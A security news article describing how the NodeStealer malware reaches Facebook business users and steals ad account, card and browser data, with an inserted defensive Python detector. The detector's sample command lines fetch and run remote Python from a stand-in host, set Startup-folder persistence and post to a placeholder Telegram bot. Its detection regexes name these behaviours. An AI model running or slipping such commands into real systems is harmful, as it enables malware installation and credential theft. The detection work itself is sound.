Sunday, April 20, 2025

New Python NodeStealer Attacking Facebook Business To Steal Login Credentials


NodeStealer, initially a JavaScript-based malware, has evolved into a more sophisticated Python-based threat that targets Facebook Ads Manager accounts, stealing sensitive financial and business data in addition to credit card details and browser information. 

The malware is delivered through spear-phishing emails with malicious links, uses DLL sideloading and encoded PowerShell for stealthy execution, and exfiltrates data via Telegram. 

[Figure: Infection chain]

The attack began with a spear-phishing email disguised as a copyright infringement notice and sent from a compromised Gmail account; it enticed recipients to click a malicious link concealed within a seemingly innocuous PDF document.


Upon clicking, the infected PDF exploited vulnerabilities in the target devices, enabling the installation of stealthy malware. Once installed, the malware silently exfiltrated sensitive information from the compromised systems.


[Figure: Email sample with the malicious embedded link]

Clicking the malicious email link downloads the ZIP archive “Nombor Rekod 052881.zip.” Extracting it drops several suspicious files: “GHelper.dll” and “oledlg.dll” are Dynamic Link Libraries (DLLs) likely used by the malware.

“Nombor Rekod 052881.exe” is the main executable file, while “hpreaderfprefs.dat” could be a data file for storing settings. 

The “images” folder contains a batch script (“active-license.bat”) and a suspicious executable (“license-key.exe”), possibly used for licensing or further malicious actions; another archive, “license.rar,” might hold additional malware components.

[Figure: Malicious encoded PowerShell execution]

The Nombor Rekod 052881.exe PDF reader was abused to sideload the malicious oledlg.dll, which, masquerading as a legitimate system file, executed the batch script images\active-license.bat under the guise of the PDF reader.

This batch script, in turn, triggered a PowerShell command, enabling the malware to operate undetected and carry out its malicious activities. 

The PowerShell script hides its window, creates a folder, and unpacks a password-protected RAR file containing a portable Python interpreter, which downloads and executes a decoy PDF while dropping a persistence mechanism in the Startup folder.

It also downloads the final malicious payload directly from a remote server using Python’s `requests` library and executes it in a hidden command prompt. 

[Figure: Python script to execute Python bytecode directly]

It uses obfuscation to deliver the infostealer payload: the malware first downloads a Python script from a remote server and executes it in memory; that script decrypts and executes a second-stage payload designed to steal sensitive information, including credit card data and web browser credentials.

The malware also targets Facebook Ads Manager accounts to extract financial and business-related data, which is then exfiltrated to specific Telegram channels using a dedicated bot API. 
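As an added defensive example (not code from the article or from Trend Micro's analysis), the following Python decodes PowerShell `-EncodedCommand` arguments from process-creation command lines and flags the behaviours described above: hidden window, password-protected RAR extraction, Startup-folder persistence, remote Python execution via `requests`, and Telegram bot API traffic. The sample command lines, the `example.invalid` URL and the `<TOKEN>` value are constructed placeholders, not indicators from the campaign.

```python
import base64
import re

# Constructed sample process-creation command lines, not telemetry from the
# article; the encoded command is built here by the example itself.
def encode_powershell(cmd: str) -> str:
    """Encode a command the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    # Stage mirroring the write-up: hidden window, RAR unpack, Startup persistence, remote Python
    "powershell -w hidden -enc " + encode_powershell(
        'New-Item "$env:APPDATA\\cache" -ItemType Directory; '
        '& unrar.exe x -pPLACEHOLDER license.rar "$env:APPDATA\\cache"; '
        'Copy-Item run.bat "$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"; '
        'python.exe -c "import requests;exec(requests.get(\'http://example.invalid/s.py\').text)"'),
    # Benign encoded command from an admin script
    "powershell -enc " + encode_powershell("Get-Date"),
    # Plain-text upload to a Telegram bot endpoint (token is a placeholder)
    'python.exe -c "import requests;requests.post(\'https://api.telegram.org/bot<TOKEN>/sendDocument\')"',
]

ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Behaviours the write-up attributes to the chain, as regexes over the decoded
# command line. Each hit is one signal; correlate several before alerting.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "password_rar_unpack": re.compile(r"\b(?:unrar|rar|7z)(?:\.exe)?\s+x\b.*\s-p\S+", re.I),
    "startup_persistence": re.compile(r"\\Start Menu\\Programs\\Startup", re.I),
    "python_remote_exec": re.compile(r"exec\(\s*requests\.get\(", re.I),
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.I),
}

def decode_encoded_powershell(cmdline: str):
    """Return the plaintext of an -enc argument, or None if absent or undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse(cmdline: str) -> dict:
    """Decode the command if encoded, then list which behaviours it shows."""
    decoded = decode_encoded_powershell(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {"encoded": decoded is not None, "decoded": decoded, "hits": hits}
```

Feed it the CommandLine field of Sysmon Event ID 1 or Windows Security 4688 records; the benign encoded `Get-Date` sample shows that decoding alone is not a verdict.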

[Figure: Targeting Facebook Ads Manager accounts]

According to Trend Micro, NodeStealer, an advanced malware variant, targets Facebook Ads Manager accounts, credit card information, and browser data and employs sophisticated techniques to evade detection. 

To counter this threat, individuals and organizations should maintain vigilance against suspicious emails, educate users about phishing tactics, and regularly scan systems for malware. 


Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cybercrime, malware, and vulnerabilities.
